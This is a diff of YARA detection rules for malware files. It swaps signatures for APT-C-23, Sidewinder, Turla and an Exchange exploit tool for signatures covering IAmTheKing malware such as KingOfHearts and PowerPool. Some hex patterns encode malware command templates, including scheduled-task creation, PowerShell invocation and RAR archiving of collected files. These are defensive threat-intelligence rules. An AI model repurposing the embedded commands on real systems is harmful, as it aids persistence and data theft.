-		uint16( 0 ) == 0x5A4D and filesize > 100KB and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and ( filesize > 8KB and filesize < 60KB ) and 4 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_APT_C_23_Micropsia_Mar_2021_2 : FILE
+rule ARKBIRD_SOLG_MAL_Keylogger_Jul_2021_1 : FILE
 {
 	meta:
-		description = "Detect Micropsia used by APT-C-23 (Build 2020)"
+		description = "Detect a keylogger used by IAmTheKing group"
 		author = "Arkbird_SOLG"
-		id = "cdd95b35-09b4-5412-bd86-55c2e7523d3e"
-		date = "2021-03-31"
-		modified = "2021-03-31"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-31/APT-C-23/APT_APT_C_23_Micropsia_Mar_2021_2.yar#L1-L26"
+		id = "186dc5f5-5cc2-551a-a34c-e775085e7f89"
+		date = "2021-07-09"
+		modified = "2021-07-12"
+		reference = "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_Keylogger_Jul_2021_1.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "a00091161ec69c9885e983117e2b424f860bfbab2551ea23b74c37fc062850b9"
-		score = 50
-		quality = 75
+		logic_hash = "dfdf5892564b93cd1bf564cfe62e37d9477b5ae0bf20e0f9a44ee97b7e3a99f8"
+		score = 75
+		quality = 71
 		tags = "FILE"
-		hash1 = "d9b938d89a13620aabe81e0a9d02778cad8658cbfd6f15e7dab47b1118b53237"
-		hash2 = "42f40fb2e4f971807fcb771c9aacc5a2361fdcdaf3eaafc31b22096d81dd0666"
-		level = "experimental"
+		hash1 = "4c6995cb65ffeac1272d296eb3273b9fbca7f4d603312a5085b5c3be96154915"
+		hash2 = "79d363a163dfb0088545e66404e0213a9e18d5ee66713d7bc906ed97c46b5ca3"
+		tlp = "White"
+		adversary = "IAmTheKing"
 
 	strings:
-		$code1 = { 8d 45 f8 8b 15 90 c7 69 00 e8 1e 05 d5 ff c7 45 d0 00 00 00 00 c7 45 d4 00 00 00 00 8b 45 d8 8b 58 5c 85 db 74 22 8b c3 8b 10 ff 12 52 50 8b 45 d8 8b 40 5c e8 af 4b db ff 29 04 24 19 54 24 04 58 5a 89 45 d0 89 55 d4 6a 04 8d 45 d8 50 6a 2d 8b 45 d8 8b 80 a4 00 00 00 50 e8 59 cd ff ff c7 45 c4 02 00 00 00 6a 04 8d 45 c4 50 6a 3f 8b 45 d8 8b 80 a4 00 00 00 50 e8 3b cd ff ff c7 45 c4 01 00 00 00 6a 04 8d 45 c4 50 6a 3f 8b 45 d8 8b 80 a4 00 00 00 50 e8 1d cd ff ff 33 c0 5a 59 59 64 89 10 68 aa df 6b 00 8b 45 e8 e8 a0 }
-		$code2 = { 6a 00 8b 45 d0 50 6a 00 6a 00 6a 00 6a 00 8b 45 d8 8b 80 a4 00 00 00 50 e8 d1 cc ff ff 85 c0 75 19 8b 15 50 a7 6e 00 8b 4d e8 8b 45 ec e8 9c fc }
-		$code3 = { 8d 4d f4 8b 45 d4 8b 40 0c ba 01 00 00 00 8b 18 ff 53 0c 8b 45 d4 8b 50 10 a1 bc 1c 6f 00 e8 82 bc ff ff 8b 55 f4 a1 bc 1c 6f 00 e8 75 bc ff ff 8b 45 f4 ba f4 7c 6d 00 e8 a0 4c d3 ff 0f 85 cf 00 00 00 ba 08 7d 6d 00 a1 bc 1c 6f 00 e8 53 bc ff ff 33 c0 55 68 9a 76 6d 00 64 ff 30 64 89 20 33 c0 89 45 dc 8d 55 9c b8 38 7c 6d 00 e8 7b 86 d5 ff ff 75 9c 68 50 7c 6d 00 8d 55 98 b8 09 00 00 00 e8 c6 c4 ff ff ff 75 98 68 60 7c 6d 00 8d 45 dc ba 04 00 00 00 e8 91 4b d3 ff e8 c4 22 d5 ff dd 5d c0 9b ff 75 c4 ff 75 c0 8d 4d e0 8b 15 30 ab 6e 00 b8 70 7c 6d 00 e8 97 32 d5 ff 8b 45 d4 83 c0 14 }
-		$s1 = { 4a 00 50 00 45 00 47 00 20 00 49 00 6d 00 61 00 67 00 65 00 20 00 46 00 69 00 6c 00 65 00 25 00 53 00 63 00 68 00 65 00 6d 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 61 00 6c 00 72 00 65 00 61 00 64 00 79 00 20 00 72 00 65 00 67 00 69 00 73 00 74 00 65 00 72 00 65 00 64 00 20 00 66 00 6f 00 72 00 20 00 25 00 73 }
-		$s2 = "Download start ." fullword wide
-		$s3 = "application/x-msdownload" fullword wide
-		$s4 = "Start Download File" fullword wide
-		$s5 = "getHttpDownload" fullword ascii
-		$s6 = "Download start ." fullword wide
-		$s7 = "-start" fullword wide
-		$s8 = "-Winapi.ImageHlp" fullword ascii
-		$s9 = "postHttpDownload" fullword ascii
+		$s1 = "sonme hting is wrong x" fullword ascii
+		$s2 = { 25 73 25 73 25 73 25 73 }
+		$s3 = { 0d 0a 5b 44 41 54 41 5d 3a 0d 0a 00 4c 6f 67 2e 74 78 74 }
+		$s4 = { 0d 0a 5b 54 49 4d 45 3a 5d 25 64 2f 25 64 2f 25 64 20 25 30 32 64 3a 25 30 32 64 3a 25 30 32 64 0d 0a 5b 54 49 54 4c 45 3a 5d }
+		$s5 = { 25 73 2d 25 30 32 64 2d 25 30 32 64 2d 25 30 32 64 2d 25 30 32 64 }
+		$s6 = { 6a 00 56 ff 75 f8 8d 45 e4 50 ff 75 f0 ff 75 f4 ff 75 08 ff 15 c4 80 40 00 8b f0 3b f7 74 12 56 ff 15 70 80 40 00 85 c0 75 1b 56 ff 15 78 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 50KB and 2 of ( $code* ) and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 25KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_APT_C_23_Micropsia_Mar_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Queenofhearts_Jul_2021_1 : FILE
 {
 	meta:
-		description = "Detect Micropsia used by APT-C-23 (Build 2018)"
+		description = "Detect QueenOfHearts malware"
 		author = "Arkbird_SOLG"
-		id = "517a33bb-0214-588f-80e4-dc82f2552330"
-		date = "2021-03-31"
-		modified = "2021-03-31"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-31/APT-C-23/APT_APT_C_23_Micropsia_Mar_2021_1.yar#L1-L24"
+		id = "763b35dd-6515-5ae8-a539-200a3647f074"
+		date = "2021-07-09"
+		modified = "2021-07-12"
+		reference = "https://twitter.com/ShadowChasing1/status/1413111641504292864"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_QueenOfHearts_Jul_2021_1.yara#L1-L23"
 		license_url = "N/A"
-		logic_hash = "69baab88d80ab15e08f3b08dfca45a1fee6c2e6077152906f391618713fac2ef"
-		score = 50
-		quality = 69
+		logic_hash = "51cb8efddbc635e9a54f58a799e6edcf8eda8ca451ebe85cbce5f6cd20bfb083"
+		score = 75
+		quality = 75
 		tags = "FILE"
-		hash1 = "eb846bb491bea698b99eab80d58fd1f2530b0c1ee5588f7ea02ce0ce209ddb60"
-		level = "experimental"
+		hash1 = "44eb620879e0c3f80ff95fda5b1e301d471b59e47c4002132df646acfc7cc5ba"
+		hash2 = "a63600e5c28a4c1770a53d310ff017abd3cb9c20cb58a85d53df0c06bcae1864"
+		hash3 = "f110ebee387c2dfac08beb674a8efec20940bc562c5231e9bb4a90296476c29f"
+		tlp = "White"
+		adversary = "IAmTheKing"
 
 	strings:
-		$code1 = { c7 85 6c fc ff ff 12 00 00 00 8b f4 8d 85 6c fc ff ff 50 8d 8d 78 fc ff ff 51 ff 15 44 b0 66 00 3b f4 e8 80 d6 fa ff 8d 85 78 fc ff ff 50 b9 e0 83 66 00 e8 06 0d fb ff 6a 00 e8 24 0a 00 00 83 c4 04 50 e8 a2 d9 fa ff 83 c4 04 c7 85 60 fc ff ff }
-		$code2 = { 68 34 4f 61 00 8d 85 cc fd ff ff 50 e8 3d 02 fd ff 83 c4 08 8b f4 6a 00 6a 00 6a 00 6a 00 8d 85 e8 fd ff ff 50 ff 15 60 b3 66 00 3b f4 e8 f2 0d fd ff 89 85 c0 fd ff ff 83 bd c0 fd ff ff 00 0f 84 49 03 00 00 8b f4 6a 00 6a 00 6a 03 6a 00 6a 00 0f b7 05 d4 83 66 00 50 8b 4d 10 51 8b 95 c0 fd ff ff 52 ff 15 58 b3 66 00 3b f4 e8 b3 0d fd ff 89 85 b4 fd ff ff 83 bd b4 fd ff ff 00 0f 84 f4 02 00 00 8b f4 6a 00 a1 d8 83 66 00 50 6a 00 6a 00 68 5c 4f 61 00 8b 4d 14 51 8d 95 cc fd ff ff 52 8b 85 b4 fd ff ff 50 ff 15 70 b3 66 00 3b f4 e8 6e 0d fd ff 89 85 a8 fd ff ff 83 bd a8 fd ff ff 00 0f 84 af 02 00 00 c7 85 9c fd ff ff 00 00 00 00 83 }
-		$code3 = { 8b 85 60 fc ff ff 83 c0 01 89 85 60 fc ff ff 83 bd 60 fc ff ff 0a 7d 2a e8 3f fc fa ff 99 b9 1a 00 00 00 f7 f9 83 c2 41 88 95 57 fc ff ff 0f b6 85 57 fc ff ff 50 b9 e0 83 66 00 e8 8b 14 fb }
-		$s1 = "szhttpUserAgent" fullword ascii
-		$s2 = "httpUseragent" fullword ascii
-		$s3 = "dwByteRead" fullword ascii
-		$s4 = { 25 59 25 6d 25 64 2d 25 49 2d 25 4d 2d 25 53 }
-		$s5 = { 53 45 4c 45 43 54 20 27 43 52 45 41 54 45 20 49 4e 44 45 58 20 76 61 63 75 75 6d 5f 64 62 2e 27 20 7c 7c 20 73 75 62 73 74 72 28 73 71 6c 2c 31 34 29 20 20 46 52 4f 4d 20 73 71 6c 69 74 65 5f 6d 61 73 74 65 72 20 57 48 45 52 45 20 73 71 6c 20 4c 49 4b 45 20 27 43 52 45 41 54 45 20 49 4e 44 45 58 20 25 27 }
-		$s6 = { 55 50 44 41 54 45 20 25 51 2e 25 73 20 53 45 54 20 73 71 6c 20 3d 20 43 41 53 45 20 57 48 45 4e 20 74 79 70 65 20 3d 20 27 74 72 69 67 67 65 72 27 20 54 48 45 4e 20 73 71 6c 69 74 65 5f 72 65 6e 61 6d 65 5f 74 72 69 67 67 65 72 28 73 71 6c 2c 20 25 51 29 45 4c 53 45 20 73 71 6c 69 74 65 5f 72 65 6e 61 6d 65 5f 74 61 62 6c 65 28 73 71 6c 2c 20 25 51 29 20 45 4e 44 2c 20 74 62 6c 5f 6e 61 6d 65 20 3d 20 25 51 2c 20 6e 61 6d 65 20 3d 20 43 41 53 45 20 57 48 45 4e 20 74 79 70 65 3d 27 74 61 62 6c 65 27 20 54 48 45 4e 20 25 51 20 57 48 45 4e 20 6e 61 6d 65 20 4c 49 4b 45 20 27 73 71 6c 69 74 65 5f 61 75 74 6f 69 6e 64 65 78 25 25 27 20 41 4e 44 20 74 79 70 65 3d 27 69 6e 64 65 78 27 20 54 48 45 4e 20 27 73 71 6c 69 74 65 5f 61 75 74 6f 69 6e 64 65 78 5f 27 20 7c 7c 20 25 51 20 7c 7c 20 73 75 62 73 74 72 28 6e 61 6d 65 2c 25 64 2b 31 38 29 20 45 4c 53 45 20 6e 61 6d 65 20 45 4e 44 20 57 48 45 52 45 20 74 62 6c 5f 6e 61 6d 65 3d 25 51 20 43 4f 4c 4c 41 54 45 20 6e 6f 63 61 73 65 20 41 4e 44 20 28 74 79 70 65 3d 27 74 61 62 6c 65 27 20 4f 52 20 74 79 70 65 3d 27 69 6e 64 65 78 27 20 4f 52 20 74 79 70 65 3d 27 74 72 69 67 67 65 72 27 29 3b }
-		$s7 = { 25 00 6c 00 73 00 28 00 25 00 64 00 29 }
-		$s8 = { 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 25 73 0d 0a }
+		$s1 = "send request error:%d" fullword ascii
+		$s2 = "cookie size :%d" fullword wide
+		$s3 = "querycode error" fullword wide
+		$s4 = { 7b 27 73 65 73 73 69 6f 6e 27 3a 5b 7b 27 6e 61 6d 65 27 3a 27 [1-10] 27 2c 27 69 64 27 3a [1-6] 2c 27 74 69 6d 65 27 3a [3-10] 7d 5d 2c 27 6a 70 67 27 3a }
+		$s5 = "PmMytex%d" fullword wide
+		$s6 = { 43 00 6f 00 6e 00 74 00 65 00 6e 00 74 00 2d 00 4c 00 65 00 6e 00 67 00 74 00 68 00 3a 00 20 00 25 00 49 00 36 00 34 00 75 00 0d 00 0a }
+		$s7 = { 25 00 73 00 5c 00 25 00 73 00 2e 00 6c 00 6f 00 67 }
+		$s8 = { 25 00 73 00 5f 00 25 00 63 00 25 00 63 00 25 00 63 00 25 00 63 00 5f 00 25 00 64 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 50KB and 2 of ( $code* ) and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 100KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_Sidewinder_Nov_2020_1 : FILE
+rule ARKBIRD_SOLG_MAL_Kingofhearts_Jul_2021_1 : FILE
 {
 	meta:
-		description = "Detect Sidewinder DLL decoder algorithm"
+		description = "Detect KingOfHearts malware"
 		author = "Arkbird_SOLG"
-		id = "9e948949-f38d-5a76-a34c-965ec9be070d"
-		date = "2020-11-14"
-		modified = "2020-11-15"
-		reference = "https://twitter.com/hexfati/status/1325397305051148292"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-15/APT_SideWinder_Nov_2020_1.yar#L1-L12"
+		id = "b1efb4db-3864-5fdc-a3a0-992734eaf22f"
+		date = "2021-07-09"
+		modified = "2021-07-12"
+		reference = "https://twitter.com/ShadowChasing1/status/1413111641504292864"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_KingOfHearts_Jul_2021_1.yara#L1-L21"
 		license_url = "N/A"
-		logic_hash = "661eb5510ff0aa59b38b2c023653f0a23867a2813d854fbd0a7a6b657d9ba671"
+		logic_hash = "6761958760997030693c832c75098890b0d6d34fd6fe9c60d68d611497d57419"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		hash1 = "8d7ad2c603211a67bb7abf2a9fe65aefc993987dc804bf19bafbefaaca066eaa"
+		hash1 = "0639e8f5e517c3f57d28bfd9f51cabfb275c64b7bca224656c2ac04f5a8c3af0"
+		hash2 = "0340a90ed4000e579c29f6ad7d4ab2ae1d30f18a2e777689e3e576862efbd6e0"
+		hash3 = "393ccb9853ea7628792e4dd982c2dd52dd8f768fdb7b80b20cbfc2fac4e298a4"
+		tlp = "White"
+		adversary = "IAmTheKing"
 
 	strings:
-		$s = { 13 30 05 00 ?? 00 00 00 01 00 00 11 ?? ?? 00 00 ?? ?? ?? 00 00 [30-80] 2B 16 07 08 8F 1? }
+		$s1 = { 43 00 72 00 65 00 61 00 74 00 65 00 44 00 6f 00 77 00 6e 00 4c 00 6f 00 61 00 64 00 46 00 69 00 6c 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 46 00 61 00 69 00 6c 00 65 00 64 00 2c 00 45 00 72 00 72 00 6f 00 72 00 3d 00 25 00 64 }
+		$s2 = { 43 00 72 00 65 00 61 00 74 00 65 00 55 00 70 00 4c 00 6f 00 61 00 64 00 46 00 69 00 6c 00 65 00 20 00 22 00 25 00 73 00 22 }
+		$s3 = "HARDWARE\\DESCRIPTION\\System\\BIOS" fullword ascii
+		$s4 = "\\1-driver-vmsrvc" fullword ascii
+		$s5 = { 73 74 61 72 74 20 64 6f 77 6e 3a 20 25 73 0a }
+		$s6 = { 66 00 69 00 6c 00 65 00 20 00 64 00 65 00 6c 00 65 00 74 00 65 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 20 00 22 00 25 00 73 00 22 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 3KB and $s
+		uint16( 0 ) == 0x5a4d and filesize > 35KB and 4 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Unknown_PE_Jul_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Jackofhearts_Jul_2021_1 : FILE
 {
 	meta:
-		description = "Detect unknown TA that focus russian people"
+		description = "Detect JackOfHearts malware"
 		author = "Arkbird_SOLG"
-		id = "228e194c-84d9-562a-8811-326c5efeafae"
-		date = "2020-07-14"
-		modified = "2021-07-14"
-		reference = "https://twitter.com/ShadowChasing1/status/1415292150258880513"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-14/MAL_Unknown_PE_Jul_2021_1.yara#L1-L19"
+		id = "42d5eadb-dd94-5a15-8a0d-d1e56b58ce2e"
+		date = "2021-07-09"
+		modified = "2021-07-12"
+		reference = "hhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_JackOfHearts_Jul_2021_1.yara#L1-L23"
 		license_url = "N/A"
-		logic_hash = "9c61d2e29315bea0cdaf45b6dc48d35b8cc2d85de84afbb3a213f095a555af71"
+		logic_hash = "6cad69beb7c104ef19beb26ca42b923283a0303c230e30b48dde58f88af4cd42"
 		score = 75
 		quality = 73
 		tags = "FILE"
-		hash1 = "ef80365cdbeb46fa208e98ca2f73b7d3d2bde10ea6c3f7cc22d4bbf39d921524"
-		tlp = "white"
-		adversary = "-"
+		hash1 = "64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273"
+		tlp = "White"
+		adversary = "IAmTheKing"
 
 	strings:
-		$s1 = { 73 00 63 00 68 00 74 00 61 00 73 00 6b 00 73 00 20 00 2f 00 43 00 52 00 45 00 41 00 54 00 45 00 20 00 2f 00 53 00 43 00 20 00 4f 00 4e 00 43 00 45 00 20 00 2f 00 54 00 4e 00 20 00 25 00 73 00 20 00 2f 00 54 00 52 00 20 00 25 00 73 00 20 00 2f 00 52 00 49 00 20 00 31 00 20 00 2f 00 53 00 54 00 20 00 25 00 30 00 32 00 64 00 3a 00 25 00 30 00 32 00 64 00 20 00 2f 00 45 00 54 00 20 00 25 00 30 00 32 00 64 00 3a 00 25 00 30 00 32 00 64 00 20 00 2f 00 46 }
-		$s2 = { 73 00 63 00 68 00 74 00 61 00 73 00 6b 00 73 00 20 00 2f 00 45 00 6e 00 64 00 20 00 2f 00 54 00 4e 00 20 00 25 00 73 }
-		$s3 = { 73 00 63 00 68 00 74 00 61 00 73 00 6b 00 73 00 20 00 2f 00 44 00 65 00 6c 00 65 00 74 00 65 00 20 00 2f 00 54 00 4e 00 20 00 25 00 73 00 20 00 2f 00 46 00 20 00 3c 00 20 00 25 00 73 }
-		$s4 = "6ad5e187ae3e8911c420434551678df2.txt" fullword wide
-		$s5 = { 55 52 4c 44 6f 77 6e 6c 6f 61 64 65 72 }
-		$s6 = { 64 6c 6c 00 4d 79 45 78 70 6f 72 74 }
+		$s1 = "%appdata%" fullword ascii
+		$s2 = "%temp%" fullword ascii
+		$s3 = { 43 3a 5c 55 73 65 72 73 5c [2-10] 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c }
+		$s4 = "CreateServiceA" fullword ascii
+		$s5 = { 5c 00 53 00 74 00 72 00 69 00 6e 00 67 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 5c 00 25 00 30 00 34 00 78 00 25 00 30 00 34 00 78 00 5c 00 46 00 69 00 6c 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e }
+		$s6 = "\\VarFileInfo\\Translation" fullword wide
+		$s7 = { 5c 00 46 00 69 00 6c 00 74 00 65 00 72 00 [2-8] 2e 00 6a 00 70 00 67 }
+		$s8 = "\\SetupUi" fullword wide
+		$s9 = { 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 25 64 }
+		$s10 = "%s.tmp" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 8KB and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 20KB and 7 of ( $s* )
 }
-rule ARKBIRD_SOLG_EXP_CVE_2021_42321_Nov_2021_1 : CVE_2021_42321 FILE
+rule ARKBIRD_SOLG_MAL_Powerpool_Jul_2021_2 : FILE
 {
 	meta:
-		description = "Detect CVE-2021-42321 exploit tool"
+		description = "Detect PowerPool malware (ALPC exploit variant)"
 		author = "Arkbird_SOLG"
-		id = "2efd58a1-e5c3-5596-b5fd-f6e2fe0ab620"
-		date = "2021-11-21"
-		modified = "2021-11-21"
-		reference = "https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-21/EXP_CVE_2021_42321_Nov_2021_1.yara#L1-L19"
+		id = "2988e9a8-da43-51fb-bd39-44aa1d161120"
+		date = "2021-07-09"
+		modified = "2021-07-12"
+		reference = "https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_PowerPool_Jul_2021_2.yara#L1-L23"
 		license_url = "N/A"
-		logic_hash = "bf45f240875f3c3ab729fe623b6c97d0540c0d7d3e9b2e4beb88af6922f8a643"
-		score = 50
-		quality = 67
-		tags = "CVE-2021-42321, FILE"
-		hash1 = "537744916ce2e78748d301901c679307e8159101f3b194add89f6e1dfbf62c32"
-		tlp = "white"
-		level = "Experimental"
-		adversary = "-"
+		logic_hash = "07d7a6444ddccbf4887de18659147354c9961092bb07ee0148392035a6d27086"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		hash1 = "035f97af0def906fbd8f7f15fb8107a9e852a69160669e7c0781888180cd46d5"
+		hash2 = "a72cdb6be7a967d3aa0021d2331b61af84455539e6f127720c9aac9b8392ec24"
+		hash3 = "df7b9d972ac83cc4a590f09d74cb242de3442cc9c1f19ed08f62bd6ebc9fc0fd"
+		tlp = "White"
+		adversary = "IAmTheKing"
 
 	strings:
-		$s1 = { 41 41 45 41 41 41 44 2f 2f 2f 2f 2f 41 51 41 41 41 41 41 41 41 41 41 4d 41 67 41 41 41 46 35 4e 61 57 4e 79 62 }
-		$s2 = "/ews/exchange.asmx" ascii
-		$s3 = { 48 74 74 70 4e 74 6c 6d 41 75 74 68 28 27 25 73 27 20 25 20 28 55 53 45 52 29 }
-		$s4 = { 22 55 73 65 72 2d 41 67 65 6e 74 22 3a 20 22 45 78 63 68 61 6e 67 65 53 65 72 76 69 63 65 73 43 6c 69 65 6e 74 }
-		$s5 = { 6d 56 6a 64 45 52 68 64 47 46 51 63 6d 39 32 61 57 52 6c 63 6a 34 4e 43 69 41 67 49 43 41 38 54 32 4a 71 5a 57 4e 30 52 47 46 30 59 56 42 79 62 33 5a 70 5a 47 56 79 49 48 67 36 53 32 56 35 50 53 4a 7a 5a 58 52 4e 5a 58 52 6f 62 32 51 69 49 45 39 69 61 6d 56 6a 64 45 6c 75 63 33 52 68 62 6d 4e 6c 50 53 4a 37 65 44 70 54 64 47 46 30 61 57 4d 67 59 7a 70 44 62 32 35 6d 61 57 64 31 63 6d 46 30 61 57 }
+		$s1 = { 5c 00 53 00 74 00 72 00 69 00 6e 00 67 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 5c 00 25 00 30 00 34 00 78 00 25 00 30 00 34 00 78 00 5c 00 46 00 69 00 6c 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e }
+		$s2 = { 2f 00 3f 00 69 00 64 00 3d 00 25 00 73 00 26 00 69 00 6e 00 66 00 6f 00 3d 00 25 00 73 }
+		$s3 = { 72 00 61 00 72 00 2e 00 65 00 78 00 65 00 20 00 61 00 20 00 2d 00 72 00 20 00 25 00 73 00 2e 00 72 00 61 00 72 00 20 00 2d 00 74 00 61 00 25 00 30 00 34 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 20 00 2d 00 74 00 62 00 25 00 30 00 34 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 }
+		$s4 = { 63 00 6d 00 64 00 20 00 2f 00 63 00 20 00 70 00 6f 00 77 00 65 00 72 00 73 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 20 00 24 00 50 00 53 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 54 00 61 00 62 00 6c 00 65 00 2e 00 50 00 53 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 20 00 3e 00 20 00 22 00 25 00 73 00 22 }
+		$s5 = { 63 00 6d 00 64 00 20 00 2f 00 63 00 20 00 70 00 6f 00 77 00 65 00 72 00 73 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 3e 00 20 00 22 00 25 00 73 00 22 }
+		$s6 = { 83 c4 04 53 56 68 [2] 42 00 ba c8 ?? 43 00 e8 ?? a9 ff ff 83 c4 0c 56 68 [2] 42 00 ba c8 ?? 43 00 e8 ?? a9 ff ff 83 c4 08 83 7c 24 20 00 68 40 01 00 00 74 61 33 ed 55 68 88 ?? 43 00 e8 ?? a4 00 00 b8 50 ?? 42 00 83 c4 0c 8b d0 66 8b 08 83 c0 02 66 3b cd 75 f5 bf 88 ?? 43 00 2b c2 83 c7 fe 8d 64 24 00 66 8b 4f 02 83 c7 02 66 3b cd 75 f4 8b c8 c1 e9 02 8b f2 f3 a5 8b c8 83 e1 03 68 90 ?? 42 00 f3 a4 e8 [2] 00 00 83 c4 04 33 f6 89 74 24 20 eb 66 6a 00 68 88 ?? 43 00 e8 ?? a4 00 00 b8 f0 ?? 42 00 83 c4 0c 8b d0 66 8b 08 83 c0 02 66 85 c9 75 f5 bf 88 ?? 43 00 2b c2 83 c7 fe 8d 64 24 00 66 8b 4f 02 83 c7 02 66 85 c9 75 f4 8b c8 c1 e9 02 8b f2 f3 a5 8b c8 83 e1 03 68 98 ?? 42 00 f3 a4 e8 ?? 95 00 00 c7 44 24 24 01 00 00 00 8b 74 24 24 83 c4 04 33 ed 68 d0 07 00 00 a3 d4 ?? 42 00 }
 
 	condition:
-		filesize > 3KB and 4 of them
+		uint16( 0 ) == 0x5a4d and filesize > 100KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_Turla_Comrat_Chinch_V4_Jan_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Slothfulmedia_Jul_2021_1 : FILE
 {
 	meta:
-		description = "Detect ComRAT V4 (Chinch) used by APT Turla group"
+		description = "Detect SlothfulMedia malware"
 		author = "Arkbird_SOLG"
-		id = "7d4daf3d-eed9-59fb-a4b9-fbc1c72adfcd"
-		date = "2021-01-23"
-		modified = "2021-01-26"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-01-23/Turla/APT_Turla_ComRAT_Chinch_V4_Jan_2021_1.yar#L1-L28"
+		id = "f4e1eca6-ecc9-5911-b69e-c8c4de43f1a1"
+		date = "2021-07-09"
+		modified = "2021-07-12"
+		reference = "hhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_SlothfulMedia_Jul_2021_1.yara#L1-L26"
 		license_url = "N/A"
-		logic_hash = "0d92207c4716f8d2fbf1d4f0cf3a33c38417fdd1565c87c251f7ff290135c435"
+		logic_hash = "929364cbb9854336641590d53ee9c4548f02845e26252d359b155e4c2b1032ca"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		hash1 = "a62e1a866bc248398b6abe48fdb44f482f91d19ccd52d9447cda9bc074617d56"
+		hash1 = "04ca010f4c8997a023fabacae230698290e3ff918a86703c5e0a2a6983b039eb"
+		hash2 = "927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae"
+		hash3 = "ed5258306c06d6fac9b13c99c7c8accc7f7fa0de4cf4de4f7d9eccad916555f5"
+		tlp = "White"
+		adversary = "IAmTheKing"
 
 	strings:
-		$com1 = "state->_reprocess_current_token || token.type != GUMBO_TOKEN_START_TAG || token.v.start_tag.attributes.data == NULL" fullword wide
-		$com2 = "fragment_ctx != GUMBO_TAG_LAST" fullword wide
-		$com3 = "has_matching_a == 1" fullword wide
-		$com4 = "ODFA: %u %d %u" fullword ascii
-		$com5 = "Custom browser path is empty." fullword ascii
-		$com6 = "Default browser path is:" fullword ascii
-		$com7 = "Search for browser path." fullword ascii
-		$com8 = "Cant retrieve any path." fullword ascii
-		$com9 = "Custom browser path is:" fullword ascii
-		$jmp1 = { 2e 64 6c 6c 00 55 4d 45 50 00 56 46 45 50 }
